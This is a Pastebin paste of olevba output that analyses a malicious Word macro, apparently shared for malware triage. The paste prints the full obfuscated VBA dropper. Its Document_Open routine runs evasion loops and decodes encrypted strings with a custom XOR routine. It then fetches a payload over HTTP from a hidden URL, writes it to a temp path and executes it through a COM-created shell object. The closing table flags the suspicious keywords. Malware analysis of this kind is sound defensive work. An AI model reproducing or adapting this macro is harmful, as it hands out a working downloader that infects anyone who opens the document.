Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.41 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS-HB-V vbaproject.bin
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: vbaproject.bin
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: vbaproject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Type K6nSWfYTCJ
- ETOOEcUg59j As Long
- HhjG8qlzfRpsnobBF As Integer
- MUF5U7fJz As Integer
- G8Q0vHJIdAb91I(7) As Byte
- End Type
- Const VTGFhpz7FtVD As String = "{00000000-0000-0000-C000-000000000046}"
- Private Type NdM1mpKmqpF
- HK8KPt1wnHrS As Long
- JITUN As IUnknown
- PqxBjecC7mI As Long
- End Type
- Private Type SyROO3UWtSacSa
- XnTmqqh As Long
- Ai9rugFwqT4H43zjH As Long
- NTAGj As String
- H7LBpJk0XA As Long
- End Type
- #If VBA7 Then
- Private Declare PtrSafe Function CoCreateInstanceEx Lib "ole32" (RDKzbu95tmi As K6nSWfYTCJ, ByVal SfmbYfniannm4s As Long, ByVal XUoz1Syc2RL As Long, PHZ6Q7NJb9 As SyROO3UWtSacSa, ByVal Yo1VAUevWQXQ3Rx9 As Long, XZpi9rugFwq As NdM1mpKmqpF) As Long
- Private Declare PtrSafe Function CLSIDFromProgID Lib "ole32" (ByVal M7FCWQq60fKbE As Long, Rvk1sUXlk As K6nSWfYTCJ) As Long
- Private Declare PtrSafe Function CLSIDFromString Lib "ole32" (ByVal VpGhFxvC As Long, PBiRBJf As K6nSWfYTCJ) As Long
- #Else
- Private Declare Function CLSIDFromString Lib "ole32" (ByVal UyDGN6 As Long, AYHEgLU27r8 As K6nSWfYTCJ) As Long
- Private Declare Function CLSIDFromProgID Lib "ole32" (ByVal Lk0XAUi0 As Long, DbVPe As K6nSWfYTCJ) As Long
- Private Declare Function CoCreateInstanceEx Lib "ole32" (PgGec2k6Kp0s As K6nSWfYTCJ, ByVal KMcNTG5kHdZheA As Long, ByVal WBdlv2f As Long, T8AWG9okSELXY As SyROO3UWtSacSa, ByVal RvgKcDV25jAf As Long, PKf91CWRm As NdM1mpKmqpF) As Long
- #End If
- Private OH0M As String
- Dim W4epF2liCnvk As String, JImjWUnbapFXE As Integer
- Dim JImjWUnbapFXE1() As Variant, JImjWUnbapFXE2() As Variant, JImjWUnbapFXE3() As Variant, JImjWUnbapFXE4() As Variant, JImjWUnbapFXE5() As Variant, JImjWUnbapFXE6() As Variant, JImjWUnbapFXE7() As Variant, JImjWUnbapFXE8() As Variant, JImjWUnbapFXE9() As Variant, JImjWUnbapFXE10() As Variant
- Dim JImjWUnbapFXE11() As Variant, JImjWUnbapFXE12() As Variant, JImjWUnbapFXE13() As Variant, JImjWUnbapFXE14() As Variant, JImjWUnbapFXE15() As Variant, JImjWUnbapFXE16() As Variant, JImjWUnbapFXE17() As Variant, JImjWUnbapFXE18() As Variant, JImjWUnbapFXE19() As Variant, JImjWUnbapFXE20() As Variant
- Dim JImjWUnbapFXE21() As Variant, JImjWUnbapFXE22() As Variant, JImjWUnbapFXE23() As Variant, JImjWUnbapFXE24() As Variant, JImjWUnbapFXE25() As Variant, JImjWUnbapFXE26() As Variant, JImjWUnbapFXE27() As Variant, JImjWUnbapFXE28() As Variant, JImjWUnbapFXE29() As Variant, JImjWUnbapFXE30() As Variant, JImjWUnbapFXE31() As Variant, JImjWUnbapFXE32() As Variant, JImjWUnbapFXE33() As Variant, JImjWUnbapFXE34() As Variant, JImjWUnbapFXE35() As Variant, JImjWUnbapFXE36() As Variant, JImjWUnbapFXE37() As Variant, JImjWUnbapFXE38() As Variant
- Function DTpA9fMZ2v() As String
- OdZH6Tn3dSUI = 12 + "1"
- Dim PJXRSt12hAfr As Long
- EX74nuarzwX0o = 32 + "87"
- AIfaz64P1sE:
- WjwN7I = 39 + "74"
- Randomize
- YvRYF79sj = 37 + "53"
- PJXRSt12hAfr = Int((2500 + 119 + 2500 - 119 + 2500 + 119 + 2500 - 119 - 1) * Rnd)
- U8vjtAoK3omal = 36 + "56"
- If PJXRSt12hAfr < (25 + 616 + 25 - 616 + 25 + 616 + 25 - 616 - 1) Then GoTo AIfaz64P1sE
- Y4SV1y5K = 84 + "71"
- DTpA9fMZ2v = PJXRSt12hAfr
- GUQhHESPDlfw2Dik = 44 + "92"
- End Function
- Sub Vg0DiIzgDxA()
- B0QeiiufSU = 10 + "80"
- Dim QQNuYU2Zlz1U As String, Bhkve9C81y9l As Object, FPODmkbfj9lL As Object
- BMLiyu5c = 9 + "36"
- QQNuYU2Zlz1U = Environ(NGh52oil6(YD0sRL05aK("F4BBC8D2D8EE14"), "S2TJblsfEeFIG4jw")) & NGh52oil6(YD0sRL05aK("C9CBF3BDC5BB7331553A095530162E"), "MmVtHw8zjF") & OH0M & NGh52oil6(YD0sRL05aK("94DBD7FD"), "Ej8dvvgPAEc")
- Jx9miqJGRIH = 19 + "51"
- Set Bhkve9C81y9l = HS5RGT77EhJD9(NGh52oil6(YD0sRL05aK("84C0F8C71D3C0D374A51182216732C1124"), "JdV6v"))
- UF1foE3p1Ghu = 42 + "9"
- Bhkve9C81y9l.Open NGh52oil6(YD0sRL05aK("8C89CD"), "HbtYl5IU6f346"), NGh52oil6(YD0sRL05aK("F2CAEFC0A0BE6F7C5D495D7050625A7B74574D4A6A773A31065915241F63"), "RhnjOMFClneOdAeB") & DTpA9fMZ2v, 0
- Qqwa0pezUa = 46 + "77"
- Bhkve9C81y9l.SEnD
- If Bhkve9C81y9l.Status = (50 + 252 + 50 - 252 + 50 + 252 + 50 - 252) Then GoTo Qhyoa
- OQl8VsVOF = 44 + "12"
- Exit Sub
- WcALqwx0acTSQ = 86 + "55"
- Qhyoa:
- XMCvW736Mek5pCa = 49 + "74"
- GSfLoW0xSKEex QQNuYU2Zlz1U, NGh52oil6(StrConv(Bhkve9C81y9l.resPONSEBODy, (16 + 160 + 16 - 160 + 16 + 160 + 16 - 160)), NGh52oil6(YD0sRL05aK("A9AFEF998884"), "S3fHEWs27m"))
- FKiWdJ6VvcA2 = 67 + "47"
- Set FPODmkbfj9lL = HS5RGT77EhJD9(NGh52oil6(YD0sRL05aK("CEE7EEC6E2E4395B1007092534"), "BTHCktKrKff"))
- MAR6Q70cJOeU = 93 + "28"
- FPODmkbfj9lL.eXeC """" & QQNuYU2Zlz1U & """"
- LHcLiuF = 79 + "67"
- Set Bhkve9C81y9l = Nothing
- End Sub
- Function NGh52oil6(ByVal GA5N56mzJIETaw As String, MJCIRg As String) As String
- JRi6mghhJeD = 55 + "92"
- On Error Resume Next
- QJM2eJP6YM = 74 + "62"
- Dim TtG2N() As Byte, XSKEexRnULKVWy(0 To 285) As Integer, UL3zdJc5GwhYx() As Byte, OLprI, Kj2MuBYW03KPx, HVhU1xMTZP9, IbY9Gm0yb15RKib, Sf1unpciXO As Boolean, I4GS0hdSZfSW0jT As Long
- DdUU = 69 + "32"
- TtG2N = StrConv(GA5N56mzJIETaw, (32 + 679 + 32 - 679 + 32 + 679 + 32 - 679))
- MscKtjWPOEW = 61 + "58"
- UL3zdJc5GwhYx() = StrConv(MJCIRg, (32 + 907 + 32 - 907 + 32 + 907 + 32 - 907))
- RDoGEkeb = 72 + "23"
- Kj2MuBYW03KPx = UBound(UL3zdJc5GwhYx)
- Pd5eabFh = 88 + "81"
- For OLprI = 0 To (64 + 700 + 64 - 700 + 64 + 700 + 64 - 700 - 1)
- XSKEexRnULKVWy(OLprI) = OLprI
- Next OLprI
- For OLprI = (64 + 790 + 64 - 790 + 64 + 790 + 64 - 790) To (71.5 + 658 + 71.5 - 658 + 71.5 + 658 + 71.5 - 658 - 1)
- XSKEexRnULKVWy(OLprI) = FCWXoQwGqoI2gsq(OLprI, (64 + 406 + 64 - 406 + 64 + 406 + 64 - 406))
- Next OLprI
- For OLprI = 1 To (1.5 + 666 + 1.5 - 666 + 1.5 + 666 + 1.5 - 666)
- XSKEexRnULKVWy(OLprI + (62.5 + 337 + 62.5 - 337 + 62.5 + 337 + 62.5 - 337 - 1)) = UL3zdJc5GwhYx(Kj2MuBYW03KPx - OLprI)
- XSKEexRnULKVWy(OLprI - 1) = FCWXoQwGqoI2gsq(UL3zdJc5GwhYx(OLprI - 1), (16 + 256 + 16 - 256 + 16 + 256 + 16 - 256 - 1) * (1 + 320 + 1 - 320 + 1 + 320 + 1 - 320) + (1 + 896 + 1 - 896 + 1 + 896 + 1 - 896 - 1) - UL3zdJc5GwhYx(Kj2MuBYW03KPx - OLprI))
- Next OLprI
- Sf1unpciXO = False
- HVhU1xMTZP9 = 0
- IbY9Gm0yb15RKib = 0
- For OLprI = 0 To UBound(TtG2N)
- If HVhU1xMTZP9 > Kj2MuBYW03KPx Then HVhU1xMTZP9 = 0
- If IbY9Gm0yb15RKib > (71.5 + 619 + 71.5 - 619 + 71.5 + 619 + 71.5 - 619 - 1) And Sf1unpciXO = False Then IbY9Gm0yb15RKib = 0: Sf1unpciXO = Not (Sf1unpciXO)
- If IbY9Gm0yb15RKib > (71.5 + 854 + 71.5 - 854 + 71.5 + 854 + 71.5 - 854 - 1) And Sf1unpciXO = True Then IbY9Gm0yb15RKib = (1.5 + 235 + 1.5 - 235 + 1.5 + 235 + 1.5 - 235 - 1): Sf1unpciXO = Not (Sf1unpciXO)
- I4GS0hdSZfSW0jT = FCWXoQwGqoI2gsq(TtG2N(OLprI), XSKEexRnULKVWy(IbY9Gm0yb15RKib))
- TtG2N(OLprI) = FCWXoQwGqoI2gsq(I4GS0hdSZfSW0jT, UL3zdJc5GwhYx(HVhU1xMTZP9))
- HVhU1xMTZP9 = HVhU1xMTZP9 + 1
- IbY9Gm0yb15RKib = IbY9Gm0yb15RKib + 1
- Next OLprI
- EzFqMf2JEX = 24 + "35"
- NGh52oil6 = StrConv(TtG2N(), (8 + 630 + 8 - 630 + 8 + 630 + 8 - 630) + (8 + 327 + 8 - 327 + 8 + 327 + 8 - 327))
- V8vVy8c = 44 + "53"
- End Function
- Function HS5RGT77EhJD9(ByVal YgXIV4mbjX As String) As IUnknown
- VFSW = 29 + "97"
- Dim VY35qfuHGIJnNWf As K6nSWfYTCJ, JrNlWUn8fgH9 As K6nSWfYTCJ, J36506Vmo As Long, Gu6IFZ1v As SyROO3UWtSacSa, G0dqKDSDuamdZ As NdM1mpKmqpF
- Ex9Mufxr = 68 + "34"
- CLSIDFromString StrPtr(VTGFhpz7FtVD), JrNlWUn8fgH9
- SwP80p = 30 + "75"
- G0dqKDSDuamdZ.HK8KPt1wnHrS = VarPtr(JrNlWUn8fgH9)
- Xcb = 42 + "47"
- J36506Vmo = CLSIDFromProgID(StrPtr(YgXIV4mbjX), VY35qfuHGIJnNWf)
- AmyEXN = 56 + "30"
- If J36506Vmo <> 0 Then Exit Function
- NcwUlf6m = 77 + "70"
- CoCreateInstanceEx VY35qfuHGIJnNWf, 0, 21, Gu6IFZ1v, 1, G0dqKDSDuamdZ
- BkzbxnGoPVt16A0cr = 10 + "80"
- Set HS5RGT77EhJD9 = G0dqKDSDuamdZ.JITUN
- Fi2vNcINQoSl8IO = 40 + "16"
- End Function
- Sub Document_Open()
- VT8UOUgsRwp = 92 + "14"
- On Error Resume Next
- UxXwF = 73 + "97"
- Dim QrqheSTtixuDC7dV9 As Long, KfEMUDskqqcvM As Long, XS5SDGNPiDrGvSh As Long
- CGo5 = 67 + "95"
- QrqheSTtixuDC7dV9 = 92378621: KfEMUDskqqcvM = 0: XS5SDGNPiDrGvSh = 0
- UbRDiiO1JR = 19 + "16"
- For KfEMUDskqqcvM = 1 To QrqheSTtixuDC7dV9
- XS5SDGNPiDrGvSh = XS5SDGNPiDrGvSh + 1
- Next KfEMUDskqqcvM
- LWEH6Qx2EwORo9 = 75 + "3"
- If XS5SDGNPiDrGvSh = QrqheSTtixuDC7dV9 Then
- NtHyo8aEUBc = 71 + "93"
- Dim L8eK2L608u2Q As Integer, HnbvNeARy As String
- For L8eK2L608u2Q = 6 To 511
- HnbvNeARy = HnbvNeARy + L8eK2L608u2Q
- Next
- AsrO2I7HYgu = 80 + "92"
- If (13.5 + 874 + 13.5 - 874 + 13.5 + 874 + 13.5 - 874 - 1) = (13.5 + 135 + 13.5 - 135 + 13.5 + 135 + 13.5 - 135 - 1) Then
- AJcvBp = 4 + "31"
- OH0M = DTpA9fMZ2v
- KZ9mSgQ0rgT2Uw = 8 + "52"
- If zKK(56) = True Then
- AdSLYPqnY7dQB = 16 + "29"
- Vg0DiIzgDxA
- ELl1nzDlSZ1y = 79 + "15"
- Else
- GLXGfQ7NxKnYj19U = 39 + "70"
- Mze1TQqABB13R
- XCzEv3EbmKe = 42 + "60"
- End If
- Else
- YlSe09O7zL = 67 + "64"
- Mze1TQqABB13R
- DMAKmdxzzr0 = 10 + "19"
- End If
- Mne6wJBeADKYmM2 = 70 + "37"
- Else
- T0FFypb0vGRCDg = 98 + "10"
- Mze1TQqABB13R
- G3qne510I = 9 + "6"
- End If
- XMW4XDjRhDv = 21 + "22"
- End Sub
- Function YX0A(ByVal MQtzLoXuOYbLqu As Variant) As Long
- OuFnguCHQCvkiEP = 1 + "39"
- Dim QwpqyS1CCmGIHl() As Byte, TSkgb6tQQP As Long
- QwpqyS1CCmGIHl = MQtzLoXuOYbLqu
- TSkgb6tQQP = UBound(QwpqyS1CCmGIHl)
- OYeqxyYkF0vmrK = 61 + "10"
- YX0A = (TSkgb6tQQP + 1) / 2
- GYQeYWE = 55 + "7"
- End Function
- Private Function FCWXoQwGqoI2gsq(RPDg57P7hlEFgul, ADcW8E85E1Pax)
- FCWXoQwGqoI2gsq = (RPDg57P7hlEFgul And Not ADcW8E85E1Pax) Or (Not RPDg57P7hlEFgul And ADcW8E85E1Pax)
- End Function
- Sub GSfLoW0xSKEex(VvtBc6OjlU As String, B6V96KLhYx As String)
- Dim GV0xeDx0mp3 As Object
- IJrWlrmJ6zEyhI8rS = 47 + "89"
- Set GV0xeDx0mp3 = HS5RGT77EhJD9(NGh52oil6(YD0sRL05aK("CEEEE5AFE7FD3703194F750A120A3E213A27322C1A2F16041354"), "WYBERAXjvh9hrbc"))
- IpK6h9F6mCyBp = 36 + "75"
- With GV0xeDx0mp3.CrEatEtextFILe(VvtBc6OjlU)
- CXAZvr3a3HQHRio = 91 + "90"
- .WrItE (B6V96KLhYx)
- PBuOt0qn2gZW = 42 + "91"
- .Close
- PTUNv57 = 85 + "16"
- End With
- IiJHZnqkHbh = 92 + "76"
- Set GV0xeDx0mp3 = Nothing
- N1Rzcq2EbVxloSUDZ = 28 + "44"
- End Sub
- Sub Mze1TQqABB13R()
- XCISdGMlkVj = 87 + "37"
- DoEvents
- ChDir 17
- Weekday 66
- C3T0ybW1xUCCzcT = EOF(17)
- Sin 39
- Rnd
- WvrdmO99Bp36Dt = Day(27)
- App.StartLogging "TiCejbAsO", 62
- AvzmJBeh7hYw = DateValue(56)
- CallByName GfvNc, 1, VbMethod, 42, 89, 74
- EEWiNLRPCNEchhE = 37 + "48"
- End Sub
- Function YD0sRL05aK(V3fzXeOUBPx2S8XV As String) As String
- Qe6K16Ywzx = 27 + "58"
- Dim Ps3eMvayS2uM As Integer
- JkCld06th = 16 + "51"
- For Ps3eMvayS2uM = 1 To YX0A(V3fzXeOUBPx2S8XV) Step 2
- YD0sRL05aK = YD0sRL05aK & Chr$(Val(Chr$(38) & Chr$(72) & Mid$(V3fzXeOUBPx2S8XV, Ps3eMvayS2uM, 2)))
- Next
- RmzBqzO5y = 81 + "13"
- End Function
- Function zKK(LUKdO7lrt As Integer) As Boolean
- Oba3cMG = 38 + "16"
- Static KJPXc As Byte
- DyHz6lC = 57 + "65"
- KJPXc = KJPXc + 1
- WUO9NHeGmcc1l7 = 63 + "74"
- If KJPXc = 1 Then Debug.Assert Not zKK(93)
- CkSCXIFqJrIuf = 39 + "7"
- zKK = KJPXc = 0
- Iak1tN3MMkVX = 72 + "12"
- KJPXc = 0
- R3eNqpCWdmoXNS = 30 + "40"
- End Function
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | Document_Open | Runs when the Word document is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | CallByName | May attempt to obfuscate malicious |
- | | | function calls |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateTextFile | May create a text file |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | VBA string | &H | Chr$(38) & Chr$(72) |
- +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement